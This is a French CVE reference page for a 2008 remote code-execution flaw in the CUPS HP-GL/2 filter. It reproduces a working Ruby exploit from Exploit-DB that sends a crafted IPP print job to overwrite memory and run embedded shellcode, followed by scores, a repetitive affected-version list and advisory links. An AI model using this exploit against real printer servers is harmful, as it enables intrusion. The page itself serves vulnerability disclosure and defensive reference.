Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
The Hewlett-Packard Graphics Language (HPGL) filter in CUPS before 1.3.9 allows remote attackers to execute arbitrary code via crafted pen width and pen color opcodes that overwrite arbitrary memory.
Informations du CVE
Faiblesses connexes
| Nom de la faiblesse | Source | |
|---|---|---|
| Category : Resource Management Errors Weaknesses in this category are related to improper management of system resources. |
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 10 | AV:N/AC:L/Au:N/C:C/I:C/A:C | nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 32470
Date de publication : 2008-10-08 22h00 +00:00
Auteur : regenrecht
EDB Vérifié : Yes
source: https://www.securityfocus.com/bid/31688/info
CUPS is prone to a remote code-execution vulnerability caused by an error in the 'HP-GL/2 filter.
Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will likely cause a denial-of-service condition. Note that local users may also exploit this vulnerability to elevate privileges.
Successful remote exploits may require printer sharing to be enabled on the vulnerable system.
The issue affects versions prior to CUPS 1.3.9.
NOTE: This issue was previously discussed in BID 31681 (Apple Mac OS X 2008-007 Multiple Security Vulnerabilities), but has been assigned its own record to better document the vulnerability.
#!/usr/bin/ruby -w
# CUPS 1.3.7 (HP-GL/2 filter) remote code execution
# gives uid=2(daemon) gid=7(lp) groups=7(lp)
# linux 2.6.25/randomize_va_space = 1, glibc 2.7
#
# An Introduction to HP-GL/2 Graphics
# http://www.tech-diy.com/HP%20Graphics%20Language.htm
# Internet Printing Protocol/1.1: Encoding and Transport
# http://tools.ietf.org/html/rfc2910
# Internet Printing Protocol/1.1: Model and Semantics
# http://tools.ietf.org/html/rfc2911
# :::::::::::::::::::::::::::::::::: setup ::::::::::::::::::::::::::::::::::
host = '127.0.0.1'
port = 631
printer = 'Virtual_Printer'
Pens_addr = 0x08073600 # objdump -T hpgltops | grep Pens$
fprintf_got = 0x080532cc # objdump -R hpgltops | grep fprintf
# linux_ia32_exec - CMD=/bin/touch /tmp/yello Size=84, metasploit.com
# encoder=PexFnstenvSub, restricted chars: 0xff
shellcode =
"\x2b\xc9\x83\xe9\xf1\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x7c" +
"\x48\x22\xd6\x83\xeb\xfc\xe2\xf4\x16\x43\x7a\x4f\x2e\x2e\x4a\xfb" +
"\x1f\xc1\xc5\xbe\x53\x3b\x4a\xd6\x14\x67\x40\xbf\x12\xc1\xc1\x84" +
"\x94\x5e\x22\xd6\x7c\x67\x40\xbf\x12\x67\x56\xb9\x09\x2b\x4a\xf6" +
"\x53\x3c\x4f\xa6\x53\x31\x47\xba\x10\x27\x22\x81\x2f\xc1\xc3\x1b" +
"\xfc\x48\x22\xd6";
# :::::::::::::::::::::::::::::::::: code :::::::::::::::::::::::::::::::::::
# beacause of hpgl-attr.c:68-73 and 269-274
def CR_setup()
"CR0,1,0,1,0,1;"
end
# PS is a bit tricky here. final weight of pen (PW code) is calculated as:
# weight*=hypot(ps[0],ps[1])/1016.0*72.0 (which is NOT hypot/73152.0),
# where ps0=72.0*arg1/1016.0 and ps1=72.0*arg2/1016.0.
# so, hoping to get things accurate I set multiplier to 1.0
def PS_setup()
"WU1;" + # set the units used for pen widths
"RO0;" + # (do not) rotate the plot
"PS0,199.123455;"; # set the plot size
end
# alternative approach to fight floating point rounding errors
# first one seems to be more successful, though
def PS_setup_alt()
"WU0;" +
"RO0;";
end
# set the pen width (PS!)
def PW(width, pen)
"PW#{width},#{pen};"
end
def PW_alt(width, pen)
"PW#{width*25.4/72.0},#{pen};"
end
# "Set the pen color..."
def PC(pen, r, g, b)
"PC#{pen},#{r},#{g},#{b};"
end
# we'll be storing shellcode in Pens[1024] static buffer
# typedef struct
# {
# float rgb[3]; /* Pen color */
# float width; /* Pen width */
# } pen_t;
def memcpy(data)
while (data.length % 16 != 0)
data += "\x90";
end
s = ''
a = 0, b = 0, i = 0
data.unpack('f*').each { |f|
case ((i += 1) % 4)
when 1: a = f
when 2: b = f
when 3: s += PC(i/4, a, b, f)
else s += PW(f, (i-1)/4)
end
}
return s;
end
# overwrite all 16 bytes with the same value
def poke(addr, value)
f = [value].pack('i').unpack('f') # floatyfication!
i = (addr-Pens_addr)/16
return PC(i, f, f, f) + PW(f, i)
end
hpgl_data =
"BP;" + # to be recognized by CUPS
CR_setup() +
PS_setup() +
memcpy(shellcode) +
poke(fprintf_got, Pens_addr) +
PC(0, 0, 0, 0); # whatever
def attribute(tag, name, value)
[tag].pack('C') +
[name.length].pack('n') +
name +
[value.length].pack('n') +
value
end
# tag - meaning (rfc2910#section-3.5)
# 0x42 nameWithoutLanguage
# 0x45 uri
# 0x47 charset
# 0x48 naturalLanguage
operation_attr =
attribute(0x47, 'attributes-charset', 'utf-8') +
attribute(0x48, 'attributes-natural-language', 'en-us') +
attribute(0x45, 'printer-uri', "http://#{host}:#{port}/printers/#{printer}") +
attribute(0x42, 'job-name', 'zee greeteengz') +
attribute(0x42, 'document-format', 'application/vnd.hp-HPGL');
ipp_data =
"\x01\x00" + # version-number: 1.0
"\x00\x02" + # operation-id: Print-job
"\x00\x00\x00\x01" + # request-id: 1
"\x01" + # operation-attributes-tag
operation_attr +
"\x02" + # job-attributes-tag
"\x03" + # end-of-attributes-tag
hpgl_data;
http_request =
"""POST /printers/#{printer} HTTP/1.1
Content-Type: application/ipp
User-Agent: Internet Print Provider
Host: #{host}
Content-Length: #{ipp_data.length}
Connection: Keep-Alive
Cache-Control: no-cache
"""
require 'socket'
NL = "\r\n"
if (false)
# ./hpgltops 0 none none 1 '' output.hpgl
puts hpgl_data
puts "[+] dumping HP/GL-2 into output.hpgl"
f = File.new('output.hpgl', 'w')
f.write(hpgl_data)
f.close()
exit(0)
end
puts "[+] connecting to #{host}:#{port}"
s = TCPSocket.open(host, port)
puts "[+] asking #{printer} for a printout"
http_request.each_line { |line|
s.write(line.strip + NL)
}
s.write(NL)
s.write(ipp_data)
s.read(1)
s.close()
puts "[+] done"
Products Mentioned
Configuraton 0
Apple>>Cups >> Version To (including) 1.3.8
- Apple>>Cups >> Version - (Open CPE detail)
- Apple>>Cups >> Version 1.1 (Open CPE detail)
- Apple>>Cups >> Version 1.1.1 (Open CPE detail)
- Apple>>Cups >> Version 1.1.2 (Open CPE detail)
- Apple>>Cups >> Version 1.1.3 (Open CPE detail)
- Apple>>Cups >> Version 1.1.4 (Open CPE detail)
- Apple>>Cups >> Version 1.1.5 (Open CPE detail)
- Apple>>Cups >> Version 1.1.5-1 (Open CPE detail)
- Apple>>Cups >> Version 1.1.5-2 (Open CPE detail)
- Apple>>Cups >> Version 1.1.6 (Open CPE detail)
- Apple>>Cups >> Version 1.1.6-1 (Open CPE detail)
- Apple>>Cups >> Version 1.1.6-2 (Open CPE detail)
- Apple>>Cups >> Version 1.1.6-3 (Open CPE detail)
- Apple>>Cups >> Version 1.1.7 (Open CPE detail)
- Apple>>Cups >> Version 1.1.8 (Open CPE detail)
- Apple>>Cups >> Version 1.1.9 (Open CPE detail)
- Apple>>Cups >> Version 1.1.9-1 (Open CPE detail)
- Apple>>Cups >> Version 1.1.10 (Open CPE detail)
- Apple>>Cups >> Version 1.1.10-1 (Open CPE detail)
- Apple>>Cups >> Version 1.1.11 (Open CPE detail)
- Apple>>Cups >> Version 1.1.12 (Open CPE detail)
- Apple>>Cups >> Version 1.1.13 (Open CPE detail)
- Apple>>Cups >> Version 1.1.14 (Open CPE detail)
- Apple>>Cups >> Version 1.1.15 (Open CPE detail)
- Apple>>Cups >> Version 1.1.16 (Open CPE detail)
- Apple>>Cups >> Version 1.1.17 (Open CPE detail)
- Apple>>Cups >> Version 1.1.18 (Open CPE detail)
- Apple>>Cups >> Version 1.1.19 (Open CPE detail)
- Apple>>Cups >> Version 1.1.19 (Open CPE detail)
- Apple>>Cups >> Version 1.1.19 (Open CPE detail)
- Apple>>Cups >> Version 1.1.19 (Open CPE detail)
- Apple>>Cups >> Version 1.1.19 (Open CPE detail)
- Apple>>Cups >> Version 1.1.19 (Open CPE detail)
- Apple>>Cups >> Version 1.1.20 (Open CPE detail)
- Apple>>Cups >> Version 1.1.20 (Open CPE detail)
- Apple>>Cups >> Version 1.1.20 (Open CPE detail)
- Apple>>Cups >> Version 1.1.20 (Open CPE detail)
- Apple>>Cups >> Version 1.1.20 (Open CPE detail)
- Apple>>Cups >> Version 1.1.20 (Open CPE detail)
- Apple>>Cups >> Version 1.1.20 (Open CPE detail)
- Apple>>Cups >> Version 1.1.21 (Open CPE detail)
- Apple>>Cups >> Version 1.1.21 (Open CPE detail)
- Apple>>Cups >> Version 1.1.21 (Open CPE detail)
- Apple>>Cups >> Version 1.1.21 (Open CPE detail)
- Apple>>Cups >> Version 1.1.22 (Open CPE detail)
- Apple>>Cups >> Version 1.1.22 (Open CPE detail)
- Apple>>Cups >> Version 1.1.22 (Open CPE detail)
- Apple>>Cups >> Version 1.1.23 (Open CPE detail)
- Apple>>Cups >> Version 1.1.23 (Open CPE detail)
- Apple>>Cups >> Version 1.2 (Open CPE detail)
- Apple>>Cups >> Version 1.2 (Open CPE detail)
- Apple>>Cups >> Version 1.2 (Open CPE detail)
- Apple>>Cups >> Version 1.2 (Open CPE detail)
- Apple>>Cups >> Version 1.2 (Open CPE detail)
- Apple>>Cups >> Version 1.2.0 (Open CPE detail)
- Apple>>Cups >> Version 1.2.1 (Open CPE detail)
- Apple>>Cups >> Version 1.2.2 (Open CPE detail)
- Apple>>Cups >> Version 1.2.3 (Open CPE detail)
- Apple>>Cups >> Version 1.2.4 (Open CPE detail)
- Apple>>Cups >> Version 1.2.5 (Open CPE detail)
- Apple>>Cups >> Version 1.2.6 (Open CPE detail)
- Apple>>Cups >> Version 1.2.7 (Open CPE detail)
- Apple>>Cups >> Version 1.2.8 (Open CPE detail)
- Apple>>Cups >> Version 1.2.9 (Open CPE detail)
- Apple>>Cups >> Version 1.2.10 (Open CPE detail)
- Apple>>Cups >> Version 1.2.11 (Open CPE detail)
- Apple>>Cups >> Version 1.2.12 (Open CPE detail)
- Apple>>Cups >> Version 1.3 (Open CPE detail)
- Apple>>Cups >> Version 1.3 (Open CPE detail)
- Apple>>Cups >> Version 1.3 (Open CPE detail)
- Apple>>Cups >> Version 1.3.0 (Open CPE detail)
- Apple>>Cups >> Version 1.3.1 (Open CPE detail)
- Apple>>Cups >> Version 1.3.2 (Open CPE detail)
- Apple>>Cups >> Version 1.3.3 (Open CPE detail)
- Apple>>Cups >> Version 1.3.4 (Open CPE detail)
- Apple>>Cups >> Version 1.3.5 (Open CPE detail)
- Apple>>Cups >> Version 1.3.6 (Open CPE detail)
- Apple>>Cups >> Version 1.3.7 (Open CPE detail)
- Apple>>Cups >> Version 1.3.8 (Open CPE detail)
Apple>>Cups >> Version 1.1
- Apple>>Cups >> Version 1.1 (Open CPE detail)
Apple>>Cups >> Version 1.1.1
- Apple>>Cups >> Version 1.1.1 (Open CPE detail)
Apple>>Cups >> Version 1.1.2
- Apple>>Cups >> Version 1.1.2 (Open CPE detail)
Apple>>Cups >> Version 1.1.3
- Apple>>Cups >> Version 1.1.3 (Open CPE detail)
Apple>>Cups >> Version 1.1.4
- Apple>>Cups >> Version 1.1.4 (Open CPE detail)
Apple>>Cups >> Version 1.1.5
- Apple>>Cups >> Version 1.1.5 (Open CPE detail)
Apple>>Cups >> Version 1.1.5-1
- Apple>>Cups >> Version 1.1.5-1 (Open CPE detail)
Apple>>Cups >> Version 1.1.5-2
- Apple>>Cups >> Version 1.1.5-2 (Open CPE detail)
Apple>>Cups >> Version 1.1.6
- Apple>>Cups >> Version 1.1.6 (Open CPE detail)
Apple>>Cups >> Version 1.1.6-1
- Apple>>Cups >> Version 1.1.6-1 (Open CPE detail)
Apple>>Cups >> Version 1.1.6-2
- Apple>>Cups >> Version 1.1.6-2 (Open CPE detail)
Apple>>Cups >> Version 1.1.6-3
- Apple>>Cups >> Version 1.1.6-3 (Open CPE detail)
Apple>>Cups >> Version 1.1.7
- Apple>>Cups >> Version 1.1.7 (Open CPE detail)
Apple>>Cups >> Version 1.1.8
- Apple>>Cups >> Version 1.1.8 (Open CPE detail)
Apple>>Cups >> Version 1.1.9
- Apple>>Cups >> Version 1.1.9 (Open CPE detail)
Apple>>Cups >> Version 1.1.9-1
- Apple>>Cups >> Version 1.1.9-1 (Open CPE detail)
Apple>>Cups >> Version 1.1.10
- Apple>>Cups >> Version 1.1.10 (Open CPE detail)
Apple>>Cups >> Version 1.1.10-1
- Apple>>Cups >> Version 1.1.10-1 (Open CPE detail)
Apple>>Cups >> Version 1.1.11
- Apple>>Cups >> Version 1.1.11 (Open CPE detail)
Apple>>Cups >> Version 1.1.12
- Apple>>Cups >> Version 1.1.12 (Open CPE detail)
Apple>>Cups >> Version 1.1.13
- Apple>>Cups >> Version 1.1.13 (Open CPE detail)
Apple>>Cups >> Version 1.1.14
- Apple>>Cups >> Version 1.1.14 (Open CPE detail)
Apple>>Cups >> Version 1.1.15
- Apple>>Cups >> Version 1.1.15 (Open CPE detail)
Apple>>Cups >> Version 1.1.16
- Apple>>Cups >> Version 1.1.16 (Open CPE detail)
Apple>>Cups >> Version 1.1.17
- Apple>>Cups >> Version 1.1.17 (Open CPE detail)
Apple>>Cups >> Version 1.1.18
- Apple>>Cups >> Version 1.1.18 (Open CPE detail)
Apple>>Cups >> Version 1.1.19
- Apple>>Cups >> Version 1.1.19 (Open CPE detail)
- Apple>>Cups >> Version 1.1.19 (Open CPE detail)
- Apple>>Cups >> Version 1.1.19 (Open CPE detail)
- Apple>>Cups >> Version 1.1.19 (Open CPE detail)
- Apple>>Cups >> Version 1.1.19 (Open CPE detail)
- Apple>>Cups >> Version 1.1.19 (Open CPE detail)
Apple>>Cups >> Version 1.1.19
- Apple>>Cups >> Version 1.1.19 (Open CPE detail)
Apple>>Cups >> Version 1.1.19
- Apple>>Cups >> Version 1.1.19 (Open CPE detail)
Apple>>Cups >> Version 1.1.19
- Apple>>Cups >> Version 1.1.19 (Open CPE detail)
Apple>>Cups >> Version 1.1.19
- Apple>>Cups >> Version 1.1.19 (Open CPE detail)
Apple>>Cups >> Version 1.1.19
- Apple>>Cups >> Version 1.1.19 (Open CPE detail)
Apple>>Cups >> Version 1.1.20
- Apple>>Cups >> Version 1.1.20 (Open CPE detail)
- Apple>>Cups >> Version 1.1.20 (Open CPE detail)
- Apple>>Cups >> Version 1.1.20 (Open CPE detail)
- Apple>>Cups >> Version 1.1.20 (Open CPE detail)
- Apple>>Cups >> Version 1.1.20 (Open CPE detail)
- Apple>>Cups >> Version 1.1.20 (Open CPE detail)
- Apple>>Cups >> Version 1.1.20 (Open CPE detail)
Apple>>Cups >> Version 1.1.20
- Apple>>Cups >> Version 1.1.20 (Open CPE detail)
Apple>>Cups >> Version 1.1.20
- Apple>>Cups >> Version 1.1.20 (Open CPE detail)
Apple>>Cups >> Version 1.1.20
- Apple>>Cups >> Version 1.1.20 (Open CPE detail)
Apple>>Cups >> Version 1.1.20
- Apple>>Cups >> Version 1.1.20 (Open CPE detail)
Apple>>Cups >> Version 1.1.20
- Apple>>Cups >> Version 1.1.20 (Open CPE detail)
Apple>>Cups >> Version 1.1.20
- Apple>>Cups >> Version 1.1.20 (Open CPE detail)
Apple>>Cups >> Version 1.1.21
- Apple>>Cups >> Version 1.1.21 (Open CPE detail)
- Apple>>Cups >> Version 1.1.21 (Open CPE detail)
- Apple>>Cups >> Version 1.1.21 (Open CPE detail)
- Apple>>Cups >> Version 1.1.21 (Open CPE detail)
Apple>>Cups >> Version 1.1.21
- Apple>>Cups >> Version 1.1.21 (Open CPE detail)
Apple>>Cups >> Version 1.1.21
- Apple>>Cups >> Version 1.1.21 (Open CPE detail)
Apple>>Cups >> Version 1.1.22
- Apple>>Cups >> Version 1.1.22 (Open CPE detail)
- Apple>>Cups >> Version 1.1.22 (Open CPE detail)
- Apple>>Cups >> Version 1.1.22 (Open CPE detail)
Apple>>Cups >> Version 1.1.22
- Apple>>Cups >> Version 1.1.22 (Open CPE detail)
Apple>>Cups >> Version 1.1.22
- Apple>>Cups >> Version 1.1.22 (Open CPE detail)
Apple>>Cups >> Version 1.1.23
- Apple>>Cups >> Version 1.1.23 (Open CPE detail)
- Apple>>Cups >> Version 1.1.23 (Open CPE detail)
Apple>>Cups >> Version 1.1.23
- Apple>>Cups >> Version 1.1.23 (Open CPE detail)
Apple>>Cups >> Version 1.2
- Apple>>Cups >> Version 1.2 (Open CPE detail)
Apple>>Cups >> Version 1.2
- Apple>>Cups >> Version 1.2 (Open CPE detail)
Apple>>Cups >> Version 1.2
- Apple>>Cups >> Version 1.2 (Open CPE detail)
Apple>>Cups >> Version 1.2
- Apple>>Cups >> Version 1.2 (Open CPE detail)
Apple>>Cups >> Version 1.2
- Apple>>Cups >> Version 1.2 (Open CPE detail)
Apple>>Cups >> Version 1.2.0
- Apple>>Cups >> Version 1.2.0 (Open CPE detail)
Apple>>Cups >> Version 1.2.1
- Apple>>Cups >> Version 1.2.1 (Open CPE detail)
Apple>>Cups >> Version 1.2.2
- Apple>>Cups >> Version 1.2.2 (Open CPE detail)
Apple>>Cups >> Version 1.2.3
- Apple>>Cups >> Version 1.2.3 (Open CPE detail)
Apple>>Cups >> Version 1.2.4
- Apple>>Cups >> Version 1.2.4 (Open CPE detail)
Apple>>Cups >> Version 1.2.5
- Apple>>Cups >> Version 1.2.5 (Open CPE detail)
Apple>>Cups >> Version 1.2.6
- Apple>>Cups >> Version 1.2.6 (Open CPE detail)
Apple>>Cups >> Version 1.2.7
- Apple>>Cups >> Version 1.2.7 (Open CPE detail)
Apple>>Cups >> Version 1.2.8
- Apple>>Cups >> Version 1.2.8 (Open CPE detail)
Apple>>Cups >> Version 1.2.9
- Apple>>Cups >> Version 1.2.9 (Open CPE detail)
Apple>>Cups >> Version 1.2.10
- Apple>>Cups >> Version 1.2.10 (Open CPE detail)
Apple>>Cups >> Version 1.2.11
- Apple>>Cups >> Version 1.2.11 (Open CPE detail)
Apple>>Cups >> Version 1.2.12
- Apple>>Cups >> Version 1.2.12 (Open CPE detail)
Apple>>Cups >> Version 1.3
- Apple>>Cups >> Version 1.3 (Open CPE detail)
Apple>>Cups >> Version 1.3
- Apple>>Cups >> Version 1.3 (Open CPE detail)
Apple>>Cups >> Version 1.3
- Apple>>Cups >> Version 1.3 (Open CPE detail)
Apple>>Cups >> Version 1.3.0
- Apple>>Cups >> Version 1.3.0 (Open CPE detail)
Apple>>Cups >> Version 1.3.1
- Apple>>Cups >> Version 1.3.1 (Open CPE detail)
Apple>>Cups >> Version 1.3.2
- Apple>>Cups >> Version 1.3.2 (Open CPE detail)
Apple>>Cups >> Version 1.3.3
- Apple>>Cups >> Version 1.3.3 (Open CPE detail)
Apple>>Cups >> Version 1.3.4
- Apple>>Cups >> Version 1.3.4 (Open CPE detail)
Apple>>Cups >> Version 1.3.5
- Apple>>Cups >> Version 1.3.5 (Open CPE detail)
Apple>>Cups >> Version 1.3.6
- Apple>>Cups >> Version 1.3.6 (Open CPE detail)
Apple>>Cups >> Version 1.3.7
- Apple>>Cups >> Version 1.3.7 (Open CPE detail)
Références
http://sunsolve.sun.com/search/document.do?assetkey=1-26-261088-1
Tags : vendor-advisory, x_refsource_SUNALERT
Tags : vendor-advisory, x_refsource_SUNALERT
http://www.mandriva.com/security/advisories?name=MDVSA-2008:211
Tags : vendor-advisory, x_refsource_MANDRIVA
Tags : vendor-advisory, x_refsource_MANDRIVA
http://www.gentoo.org/security/en/glsa/glsa-200812-11.xml
Tags : vendor-advisory, x_refsource_GENTOO
Tags : vendor-advisory, x_refsource_GENTOO
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9666
Tags : vdb-entry, signature, x_refsource_OVAL
Tags : vdb-entry, signature, x_refsource_OVAL
https://www.redhat.com/archives/fedora-package-announce/2008-October/msg00380.html
Tags : vendor-advisory, x_refsource_FEDORA
Tags : vendor-advisory, x_refsource_FEDORA
https://www.redhat.com/archives/fedora-package-announce/2008-October/msg00331.html
Tags : vendor-advisory, x_refsource_FEDORA
Tags : vendor-advisory, x_refsource_FEDORA
http://lists.opensuse.org/opensuse-security-announce/2008-10/msg00006.html
Tags : vendor-advisory, x_refsource_SUSE
Tags : vendor-advisory, x_refsource_SUSE
http://lists.opensuse.org/opensuse-security-announce/2009-01/msg00004.html
Tags : vendor-advisory, x_refsource_SUSE
Tags : vendor-advisory, x_refsource_SUSE
http://lists.apple.com/archives/security-announce/2008/Oct/msg00001.html
Tags : vendor-advisory, x_refsource_APPLE
Tags : vendor-advisory, x_refsource_APPLE
http://www.securityfocus.com/archive/1/497221/100/0/threaded
Tags : mailing-list, x_refsource_BUGTRAQ
Tags : mailing-list, x_refsource_BUGTRAQ
Les informations affichées sur CVE Find proviennent de plusieurs sources de référence rigoureusement sélectionnées. Les données CVE sont fournies par MITRE Corporation et la National Vulnerability Database (NVD). Le catalogue des vulnérabilités activement exploitées (KEV) provient de la Cybersecurity and Infrastructure Security Agency (CISA), tandis que les scores EPSS sont issus de FIRST.org. Enfin, les données relatives aux faiblesses logicielles (CWE) et aux schémas d'attaque courants (CAPEC)
sont maintenues par MITRE Corporation, et les informations sur les configurations
logicielles et matérielles (CPE) proviennent du NVD.